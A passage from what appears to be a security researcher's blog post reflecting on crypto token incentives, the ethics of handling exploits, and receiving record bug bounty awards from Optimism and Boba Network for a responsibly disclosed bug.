Meanwhile, there's a kind of fishy thing going on with many crypto projects, with what can feel like a "dark pattern" arising wherein projects force users to become invested in their project (by way of a token) to merely be customers.

The result is that it can be hard to trust anyone anymore, as seemingly every single participant—even ones that classically would have tried to remain neutral—suddenly are being pushed around by carefully designed monetary incentives.

To draw a realistic-to-crypto analogy: imagine if using Apple Music involved not a subscription fee, but proving you own some value in shares of Apple's stock. Now, if Apple goes up in value, so do the shares you are required to hold.

This thought demoralizes me at times (and I will note that Orchid has avoided such models). And yet, is this even new? Are "Apple fanbois" accidentally incentivized by their expensive hardware investment (and later resale value)?

I actually have been meaning to write an article on what I feel is a form of "runaway incentives" on the supply side—as opposed to with consumers—of some crypto projects, a topic I have occasionally written about so far only in random comments on Hacker News, GitHub, and Twitter.

If you would be interested in reading such, I recommend following me on Twitter. I also am usually quite open to giving (for free! I am a politician in California and don't want to deal with the honoraria restrictions) talks at hackathons or conferences, particularly if I don't have to travel far.

Exploitation Games

I've been working on incubating "exploits" (nothing else like this bug, to be clear) for a number of projects ("as one does" in security), and the discussion constantly comes up about "what to do with them"; and the answer just isn't at all obvious.

People discuss—sometimes clearly in jest, sometimes... not so much ;P—ways to profit off of hacks by releasing "epic takedowns" of various projects and shorting your way to riches, or start plotting "the perfect crime" (usually quite fanciful).

Over the years, I have heard many stories from hackers I have worked with—including both geohot and my good friends at—about bug bounty programs, but have never myself sought out or tried to participate in one.

I've often then felt that there just isn't enough "friendly" adversarialism in the crypto community. I'd love to see a conference where every single talk is "why protocol X will never work" without that being seen as "unconstructive".

I thereby tend to actually gravitate strongly towards projects that are willing to take a hard line with other projects and "duke it out" in benchmarks, articles, or analysis, calling out scams rather than merely ignoring them.

Bountiful Bug Bounties

Which finally brings me back to this Optimism bug. I needed a talk to give at ETHDenver (due to a scheduling SNAFU) and I saw that Optimism listed a bounty with Immunefi that has a $2,000,042 maximum payout for "critical" bugs.

(Technically, their Immunefi program did not cover this bug, as it is not in the explicit scope, so I couldn't go through Immunefi and had to reach out directly. But they have been extremely gracious and immediately said they would cover it equivalently.)

The program from Optimism isn't even the highest maximum listed on Immunefi: Olympus, which describes itself as "a decentralized reserve currency", has a bug bounty program listed with a maximum payout of $3,333,333!

This then gave me not one but two incentives to "bother with" dropping everything else I was doing to deeply analyze "that thing I saw that felt off but do I really care to look as I need to work on my own project (or even take a nap)".

Feeling Optimistic

And, in fact, Optimism decided to award the full $2M+42; ...which has the property of retroactively compensating me for the copious time I've spent analyzing their project this past year, as if I had been a team member.

(Which causes yet another interesting incentive alignment: I now feel "quite a bit grateful" to Optimism, and have come to like them more because of this award... maybe you shouldn't trust what I say about them? ;P)

We can also maybe feel good that the existence of this large bounty did what it set out to do: Optimism made a mistake, but they then incentivized—and quite generously so!—the work to correct it, protecting their users from loss.

(BTW, Boba and Metis—both forks of Optimism—had a max $100,000 and a max $1,000,000 bounty, respectively. It is an interesting question in some sense: should they share the responsibility of such a bounty?)

If nothing else, I successfully scored an invite to their party at ETHDenver ;P. Maybe I'll see some of you there!

I missed it in all of the bustle on Thursday, but apparently Boba Network officially announced that they would additionally extend to me their max award, bringing the total to $2,100,042... which might actually set a record for the largest bounty ever received for a single bug? (None of us had realized this until it was pointed out by a comment on Hacker News; and while beating the old record by a mere +$42 felt like a technicality, the +$100k makes the claim to a new record feel a lot more fair!)